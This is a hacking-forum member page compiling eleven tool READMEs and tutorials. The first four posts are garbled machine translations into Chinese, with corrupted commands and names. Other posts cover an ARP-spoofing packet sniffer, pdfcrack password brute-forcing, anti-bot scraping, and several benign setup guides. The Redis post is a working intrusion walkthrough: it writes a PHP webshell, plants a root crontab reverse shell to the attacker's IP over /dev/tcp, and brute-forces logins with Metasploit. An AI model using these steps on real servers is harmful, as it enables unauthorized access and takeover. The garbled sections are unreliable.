Jump to content

HireHackking

Members
  • Joined

  • Last visited

Everything posted by HireHackking

  1. 间谍活动是一种网络数据包嗅探器,可拦截大量通过接口的数据。该工具允许用户运行正常和冗长的流量分析,该分析显示了流量的实时供稿,揭示数据包方向,协议,标志等。间谍活动也可能欺骗ARP,因此,目标发送的所有数据都通过攻击者(MITM)重定向。间谍活动支持IPv4,TCP/UDP,ICMP和HTTP。 Espionag E用Python 3.8编写,但也支持3.6版。这是该工具的第一个版本,因此,如果您想帮助并为间谍活动添加更多信息,请联系开发人员。 Note:这不是Scapy包装器,Scapylib仅协助HTTP请求和ARP。 安装 1: git克隆3https://www.github.com/josh0xa/espionage.git 2: CD间谍活动 3: sudo python3 -m pip install -r unigess.txt 4: sudo python3 espionage.py- -help 用法 sudo python3 espionage.py- normal -iface wlan0 -f capture_output.pcap 命令1将执行干净的数据包嗅探,并将输出保存到提供的PCAP文件中。用任何网络接口替换WLAN0。 sudo python3 espionage.py-verbose -verbose -iface wlan0 -f capture_output.pcap 命令2将执行更详细的(详细)数据包嗅探,并将输出保存到提供的PCAP文件中。 sudo python3 espionage.py-正常- iface wlan0 命令3仍将执行干净的数据包嗅探,但是它不会将数据保存到PCAP文件中。建议保存嗅探。 sudo python3 espionage.py- verbose -httpraw -iface wlan0 命令4将执行详细的数据包嗅探,还将在字节中显示RAW HTTP/TCP数据包数据。 sudo python3 espionage.py-靶标目标-IP-ADDRESS -IFACE WLAN0 命令5将欺骗目标IP地址,所有发送的数据将被路由回到攻击者机器(您/Localhost)。 sudo python3 espionage.py-iface wlan0- onlyhttp 命令6仅利用HTTP协议在端口80上显示嗅觉数据包。 sudo python3 espionage.py-iface wlan0- llyhttpsecure 命令7将仅利用HTTPS(安全)协议在端口443上显示嗅探数据包。 sudo python3 espionage.py-iface wlan0- urlonly 命令8只会嗅探和返回受害者访问的嗅探网址。 (与SSLSTRIP最有效)。按CTRL+C内订单以停止数据包干扰并将输出写入文件。 espionage.py [-h] [ - version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-hr] [-f filename] -i iface [-t目标] 可选参数: -h, - 赫尔普显示此帮助消息和退出 - Version返回数据包嗅探器版本。 -n, - 正常执行更清洁的干扰,不太复杂。 -v, - verbose(推荐)执行更深入的数据包干扰/嗅探。 -url, - urlonly只有使用http/https访问了URL。 -o, - llyhttp仅嗅探TCP/HTTP数据,返回访问的URL。 -ohs, - 一个lyhttpsecure 仅嗅探HTTPS数据(端口443)。 -hr,-httpraw显示恢复或发送在端口80上的原始数据包数据(字节订单)。 (建议)数据输出的参数(.pcap): -f文件名,-filename FileName 存储输出的文件名(使扩展名'.pcap')。 (必需)执行所需的参数: -i iface,-iface iface 指定网络接口(即WLAN0,ETH0,WLAN1等) (ARP欺骗)使用ARP Spoofing Utility :所需的参数 -t目标, - 目标目标 菜单 可以在此处找到简单的媒介写作: 单击此处获取官方媒介文章 010-110该计划的开发人员Josh Schiavone仅出于教育和道德目的就编写了以下代码。嗅探/拦截的数据不适用于恶意意图。 Josh Schiavone对滥用此渗透测试工具概不负责或负责。愿上帝保佑大家。 写入 MIT许可证 版权(C)2024 Josh Schiavone
  2. : 状态检查器是一个Python脚本,它根据其HTTP状态代码检查一个或多个URL/域的状态以及类别。版本1.0.0由Black-Scorp10 T.Me/Black-Scorp10创建, 功能 检查单个或多个URL/域的状态。异步HTTP请求提高性能。颜色编码的输出,以更好地可视化状态代码。检查多个URL时进度栏。将结果保存到输出文件。无法访问的URL和无效响应的错误处理。命令行界面,用于简化使用。 安装 克隆repository: bash git克隆3https://github.com/your_username/status-checker.git cd status-checker 安装依赖项: bash pip install -r unigess.txt 用法 python status_checker.py [-h] [-d域] [-l list] [-o output] [-v] [-update] -d,-domain:单个域/url要检查。 -l,-list:文件,其中包含要检查的域/URL列表。 -o,-ox -oxput:文件以保存输出。 -v,-version:显示版本信息。 -update:更新工具。 example: python status_checker.py -l urls.txt -o results.txt Preview 许可证 此项目是根据MIT许可证获得许可的- 有关详细信息,请参见许可证文件。
  3. 信息网络应用程序安全 安装: sudo apt安装python3 python3-pip PIP3安装TermColor PIP3安装Google PIP3安装选项complete PIP3安装BS4 PIP3安装漂亮的尺寸 git克隆https://github.com/matrix07ksa/hackerinfo/ CD Hackerinfo chmod +x hackerinfo ./hackerinfo -h python3 hackerinfo.py -d -d www.facebook.com -f pdf [+] - 运行domain_filter_file .- [+] - 搜索[www.facebook.com]文件[pdf] .---- https://ww.facebook.com/gms_hub/share/dcvsda_wf.pdf https://ww.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf https://www.facebook.com/gms_hub/share/videorequirementschart.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_en_us.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf https://ww.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl.pl.pdf H TTPS: //www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf https://www.facebook.com/rsrc.php/ya/r/avye1rrg376.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf https://ww.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf ########################## 用法: sudo python setup.py安装 PIP3安装hackinfo
  4. 免费用于各种工具/恶意软件。它仅针对C2工具开始,但也变成了跟踪信息遗传者和僵尸网络。它使用shodan.io/'shodan搜索来收集IPS。最新的集合总是存储在数据中。 IP被工具分解,并且有一个all.txt。 提要应每天更新。积极致力于使后端更可靠 荣誉提及 许多Shodan查询来自其他CTI研究人员: Bushidotoken Michael Koczwara Viriback Gi7w0rm @Glacius_向他们大喊大叫! 感谢Bertjancyber创建了KQL查询以摄入此提要 最后,感谢y_nexro创建了C2Live,以可视化数据 我该跟踪什么? C2'sCobalt Strike Metasploit Framework Covenant Mythic Brute Ratel C4 Posh Sliver Deimos PANDA NimPlant C2 Havoc C2 Caldera Empire Ares MalwareAcidRain Stealer Misha Stealer (AKA Grand Misha) Patriot Stealer RAXNET Bitcoin Stealer Titan Stealer Collector Stealer Mystic Stealer Gotham Stealer Meduza窃取者Quasar Rat Shadowpad异步dcrat bitrat darkcomet trojan Xtremerat tromerat trojan nanocore大鼠大鼠Trojan gh0st大鼠Trojan trojan trojan drom darktrack trojan njrat trojan trojan trojan trojan remcos pro remcos pro trojan trojan trojan trojan trojan毒药botnets7777僵尸网络 在本地运行 如果要托管私人版本,请将shodan api键放入称为shodan_api_key的环境变量中 echo shodan_api_key=api_key〜/.bashrc bash python3 -m pip install -r unigess.txt python3 tracker.py 贡献 如果您知道识别对手基础架构的任何其他shodan搜索,我鼓励打开问题/公关。我不会为提交的内容设置任何硬准则,只是知道,忠诚度至关重要(高度/假阳性比率是焦点)。 参考 与迈克尔马云惹不起马云科兹瓦拉(Michael Koczwara)狩猎C2与迈克尔马云惹不起马云科兹瓦拉(Shodan)与迈克尔马云惹不起马云科兹瓦拉(Shodan)的迈克尔马云惹不起马云科兹瓦拉(Shodan)3https://Twitter.com/michalkoczwara/status/159175051323238118401? https://Twitter.com/michalkoczwara/status/1641119242618650653 3https://TWITTER.COM/MICHALKOCOCZWARA/STATUS/1641676761283850241 https://Twitter.com/_montysecurity/status/1643164749599834112 https://TWITTER.COM/VIRIBACK/STATUS/STATUS/1713714868564394366 https://GI7W0RM.MEDIUM.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd 3https://TWitter.com/glacius_/status_/status/173169990137379999209
  5. Nezha probe can conveniently monitor the server's real-time network, disk and other status. Moreover, the interface is beautiful and simple to build, and it is a good tool in our daily operation and maintenance. In this article, let’s learn its installation process together. Preparation A server (kali is OK) Gitee account (github is unstable in China) domain name (not required) Register oauth For security, Nezha probe does not use local login. Instead, it uses third-party login interfaces such as Gitee and Github. Because Github is always in a state of distraction, he chose the domestic Gitee platform. 01 Registering two Gitee accounts is a problem with the third-party login interface. The author cannot log in with the same account when deploying. Whether Gitee or Github, you need two accounts, that is, use A to create an oauth application and use B to authorize login. 02 Create an oauth application login account, visit https://gitee.com/oauth/applications, and create an application. After creation is completed, the effect is as follows: Callback address format: http://{Server IP}:8008/oauth2/callback Record the ID and Secret values. Installing the probe Execute the command curl -L https://gitee.com/naibahq/nezha/raw/master/script/install.sh -o nezha.sh chmod +x nezha.sh sudo CN=true ./nezha.sh Enter the corresponding information according to the prompts. It should be noted that Gitee's login account is Account B Next, open port 8008 5555 in the server firewall and server security groups respectively. Otherwise, I can't access it. Next, visit ip:8008 and you will see the page. Login the background After entering the home page, click Login. Enter the information of account B and log in to Gitee. When the authorization page appears, click Authorization. Click to add a new server, the configuration is as follows Click the Settings page to configure the server domain name/IP Add client (Agent) Enter the panel background, select the icon according to the system type and copy it, and follow with one click. Or access the following command to download the installation script to the local area. Then install it manually. curl -L https://gitee.com/naibahq/nezha/raw/master/script/install.sh -o nezha.sh chmod +x nezha.sh sudo CN=true ./nezha.sh Also note that you can open the relevant ports. After the configuration is completed, the effect is as follows Configure domain name and proxy If you have an available domain name, you can parse the current domain name. After the parsing is completed, the reverse proxy is configured as follows: location / { proxy_pass http://127.0.0.1:8008; proxy_set_header Host $host; } location /ws { proxy_pass http://127.0.0.1:8008; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection 'Upgrade'; proxy_set_header Host $host; }
  6. Currently, it is based on mqtt and Xiaomi devices. Will be improved in the future. code is as follows type: picture-elements image: - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E5%AE%A2%E5%8E%85_20240313144539.png style: width: 50% elements: - type: image entity: light.led_1 tap_action: action: none style: pointer-events: none top: 50% left: 50% width: 100% mix_blend_mode: lighten state_image: 'off': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E9%80%8F%E6%98%8E_20240313163212.png 'on': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E5%AE%A2%E5%8E%85%E5%BC%80%E7%81%AF2_20240313163404.png - type: image entity: light.led_1 tap_action: action: toggle style: top: 60% left: 70% width: 8% state_image: 'off': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%81%AF%E5%85%A8%E5%85%B3_20240313160401.png 'on': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%81%AF%E5%BC%80_20240313145253.png - type: image entity: light.yelight_lamp1_b04b_light tap_action: action: none style: pointer-events: none top: 50% left: 50% width: 100% mix_blend_mode: lighten state_image: 'off': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E9%80%8F%E6%98%8E_20240313163212.png 'on': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E9%A4%90%E5%8E%852_20240313162836.png - type: image entity: light.yelight_lamp1_b04b_light tap_action: action: toggle style: top: 60% left: 30% width: 8% state_image: 'off': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%81%AF%E5%85%A8%E5%85%B3_20240313160401.png 'on': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%81%AF%E5%BC%80_20240313145253.png - type: image entity: switch.zhimi_ma2_73a6_switch_status tap_action: action: toggle style: top: 35% left: 67% width: 6% state_image: 'on': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%A9%BA%E8%B0%83%E7%83%AD_20240313174945.gif 'off': - https://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/%E7%A9%BA%E8%B0%83%E5%86%B7_20240313174908.gif
  7. PDF is the most common document format in our work. We often use encrypted files for important files. But when I forget my password, how should you deal with it? Next we use Mr. World to create a pdf file. Next, we add a password to the just generated pdf in Linux. The command is as follows: #Installing the tools first apt-getinstallpdftk #Add password to the file pdftkkali.pdfoutputout.pdfuser_pw666666 As mentioned above, we added a password (666666) to the kali.pdf file and output it as out.pdf Now, let’s take a look at how to crack it. First, we install the tool pdfcrack apt-getinstallpdfcrack Use specified characters to start brute-force cracking pdfcrack-fout.pdf-n6-m8-c0123456789 Parameter Detailed Explanation-f: Select the pdf file to crack -n: How many characters are the shortest password -m: How many characters are the password longest -c: The character set used In the column above, my password is only 6 pure numbers. It took less than 30 seconds to crack. Therefore, for important files, you must strengthen the password strength and backup the password to prevent the password from being lost. Of course, in the column above, we only use numbers. What if there are letters? Why not try the universal password below. pdfcrack-fsecret.pdf-n1-m20-c0123456789abcdefghijklmnopqrstuvwxyABCDEFGHIJKLMNOPQRSTUVWXYZ.In theory, the success rate is 99.99%, it is just a matter of time. Similarly, pdfcrack supports dictionary mode, the command is as follows: pdfcrack-fout.pdf-wpass.txtMore exciting articles Welcome to follow us
  8. In Python crawlers, anti-crawler mechanisms will be encountered. If you need to access the normal browser, the content will be displayed, that is, the content will be loaded dynamically. I wrote earlier that using Selenium to implement it. But configuration is more troublesome. Therefore, another method is introduced here! Use Python + playwright to implement anti-crawler. Since a higher version of Python environment uses pip to install related modules, an error will be reported. Therefore, it is recommended to use a virtual environment. Selenium Crawler Reference Article 《Python+Selenium 反爬虫实战》 Create a virtual environment python3 -m venv biiaoge #biaoge is the name of the virtual environment source bolde/bin/activate #Activate virtual environment Next, we need to install relevant tools in the virtual environment. Install playwright pip3 install playwright After the installation is completed, install the corresponding browser (there is no browser in the local environment to install, if there is, you can ignore it) playwright install firefox Because it is installed in a virtual environment, it has no impact on the local environment. Sample code: from playwright.sync_api import sync_playwright from bs4 import BeautifulSoup # Use sync_playwright context manager with sync_playwright() as p: # Start Firefox browser browser=p.firefox.launch(headless=True) # Create a new browser page page=browser.new_page( user_agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' ) # Open the landing page page.goto('https://data.xxxx.cn/easyquery.htm?cn=A01zb=A010G06sj=202502') # Wait for the page to load page.wait_for_load_state('networkidle') # Get rendered HTML html=page.content() soup=BeautifulSoup(html, 'html.parser') # Close the browser browser.close() # Analyze data table_main=soup.find('table', id='table_main') if table_main: time_th=table_main.find_all('th')[1] time=time_th.find('strong').get_text(strip=True) tbody=table_main.find('tbody') data=[] for tr in tbody.find_all('tr'): tds=tr.find_all('td') indicator=tds[0].get_text(strip=True).replace('\n', '') price=tds[1].get_text(strip=True) data.append((time, indicator, price)) for item in data: print(f'Time : {item[0]}') print(f'index: {item[1]}') print(f' price : {item[2]} yuan/kg\n') else: print('Table data not found') Effect Precautions Every time you run a script, you need to go to the virtual environment. Therefore, it is best to recommend writing a script.
  9. When we write an article, we use commands to demonstrate how to use certain tools. Often, it is a display of static commands. If you want dynamic commands, you can only record the interface into a GIF through the screen recording tool. However, when the command runs for a long time, the recording time will be longer, the GIF will be larger, and uploading will not be convenient. Is there a better way? Here I will introduce text recording, also called command line recording. The file size is around 10 kb. The artifact is asciinema First, let’s take a look at the effect: You can see that the command runs the same as the recorded video, but it is not a video, so you can try to copy the code in the demo. Installation Centosyum install asciinemaUbuntu/Kaliapt-get install asciinema Login The login of asciinema is different from the traditional account password. It only requires one email address to enable personal login. Execute the command asciinema auth to generate a URL. Copy URL On the browser, enter your email address, and the system will send a certified URL. Open the email and click the URL to activate it. Using Enter the command in the terminal asciinema rec #Start recording When the command input is completed, click ctrl + d or exit to exit to exit the recording. Press Enter to upload the file. There will be a connection successfully. The effect of clicking on the connection is as follows Click to share, there are many sharing forms, as follows It is even more necessary to embed the corresponding code. Of course, it can also be saved directly to the local area. The command is as follows: asciinema rec kali.cast #Record file asciinema play kali.cast #play file asciinema upload kali.cast #Upload file Turn to GIF Some special circumstances, such as the WeChat official account cannot play external links, and can only be displayed through GIF. Therefore, we can convert the generated cast file into GIF installation asciicast2gifdocker pull asciinema/asciicast2gif conversion GIFdocker run --rm -v $PWD:/data asciinema/asciicast2gif -S demo.cast demo.gif
  10. Redis is a cross-platform non-relational database. The data in memory can be saved on disk and can be loaded again for use during restart. It supports strings, hash tables, lists, collections, ordered collections, bitmaps, hyperloglogs and other data types. Vulnerability Principle When Redis defaults to port 6379 and is a password or a weak password, the redis service on the public network will be accessed by any user unauthorized, read data, and use redis's own commands to write files. Thus gaining system permissions. Experimental Environment Centos7 (public network, victim end) Kali Linux (attack end) Installing Redis We first install Redis in Centos. Execute the following commands separately wget http://download.redis.io/releases/redis-2.8.17.tar.gz #Download tar xzf redis-2.8.17.tar.gz #Decompression cd redis-2.8.17 make #Compiled cd src cp redis-server /usr/bin cp redis-cli /usr/bin cd . cp redis.conf /etc/ redis-server /etc/redis.conf It should be noted that we need to open port 6379 in the firewall and security group. Unauthorized Test We directly execute the following command in kali redis-cli -h 8.219.xxx.xxx If it is a higher version of redis, you need to modify the configuration file. Remove the # comment before bind and change the protected-mode to no. Use redis to write webshell When writing webshells using redis, we need to know the path of the web site. Otherwise, you won't be able to connect even if you generate a webshell. Suppose that when we are in our site directory, execute the following command. config set dir /var/www/html #Set directory config set dbfilename kali.php #Generate file set xxx '\r\n\r\n?php phpinfo();\r\n\r\n' #Write content to the file save#Save After completion, we access the file Bounce Shell We use nc to listen to ports in kali. nc -lvp 5555 Next we use redis to create a timed task file. Online nc through timed tasks config set dir /var/spool/cron/crontabs config set dbfilename root set xxx '\n\n* * * * * * /bin/bash -i/dev/tcp/kali's IP/5555 01\n\n' After saving time, the command will be automatically executed to go online. redis password cracking Generally speaking, the default password will be set. We modify it in the configuration file redis.conf. Configure msf msfconsole use auxiliary/scanner/redis/redis_login set RHOSTS 8.219.xxx.xxx set PASS_FILE /root/22.txt #Set password dictionary run There are many modules for redis utilization in msf. We can use the following command to view search redis After simple configuration, it can be used directly.
  11. Feixun N1 is particularly playable. This article will introduce in detail how to use N1 to brush isrore and use bypass routes. It's so painful to write this article. Most of the articles online are from 18 years, with various pitfalls. I'm still doing it until 4 a.m. Preparation Hardware Fixun N1 (firmary is v2.23 0410 NS) USB disk (it is best if two, try to change one if you can't flash) HDMI (it's OK to connect to the monitor. If you don't have one, you can buy it. You can also make one by yourself. Find two mobile phone data cables, cut it short and connect it together according to the color.) Software balenaEtcher (mirror writing tool) isrore firmware (http://fw.koolcenter.com/iStoreOS/alpha/n1/) Firstware downgrade Connect the device to the monitor and you can see the current firmware version. Anyone above 2.2 will be downgraded. Connect the network Next, connect the mouse to N1. Click Network Connect to connect to your WiFi. The IP address will be displayed after the connection is successful. Open ADB and click on the firmware version 4 times in a row, and the word adb will be prompted to open. Run the downgrade toolkit Enter 2 to confirm N1 downgrade. Press any key to continue. After it is finished, it will automatically restart. Next, connect the USB cable to the computer. Run the run.bat file in the downgrade toolkit again. Enter 3 Brush into the bottom package Flash the underlying package to allow N1 to boot from the USB drive. After N1 enters the line brush, do not pull the line. Run USB Burning_Tool_v2.1.6.8 and you will see the word "Connect Success". Click File - Burn Package - N1_mod_by_webpad_v2.2_20180920 (firmware) Wait for the flash to complete. After booting up, the classic Android TV box interface is available. Click Settings to connect to the network. Making isrore Run balenaEtcher. Select the downloaded firmware (be careful not to decompress the mirror package) and start making. After completion, the content of the USB drive should be like this. If there is any problem, use DiskGenius to delete the partition. Re-worked! U disk boot isrore Under normal circumstances, now insert the USB drive (the one close to HDMI, actually both are OK) Note that the monitor will not display after powering on. Note that the monitor will not display after powering on. (I was cheated for half a night and thought it was a firmware problem.) Next, log in to the router. Check the device IP Access IP address, default username and password root password Next, we need to write the data from the USB flash drive to the storage (eMMC) of N1. According to the official prompts, execute the following command. install-to-emmc.sh At this point, unplug the USB flash drive and restart it. Filling time After the TV box firmware cannot be started normally from the USB drive, theoretically insert the USB drive and restart it. The USB drive will start automatically (because the underlying layer has been modified). Solution: Install the APP (Fixun Remote Control) on the mobile phone and connect according to the TV IP address. After selecting the line brush, it will start from the USB drive. After restarting the online flash, enter Recovery and follow the above description. Theoretically, the USB flash drive will start after restarting the online flash. Enter the system (the monitor does not display the logo flashes). But the prompt is as follows: The reason is that there is a problem with the firmware in the USB flash drive. For example, after decompressing the file when flashing the firmware, select Mirror flashing. mount disk Just mount the disk according to the Linux environment. It should be noted that mount 3.5-inch disks. Need to buy the one with additional power supply. Otherwise it cannot be recognized. Tool Kit WeChat public account [kali notes] backend reply n1 to get.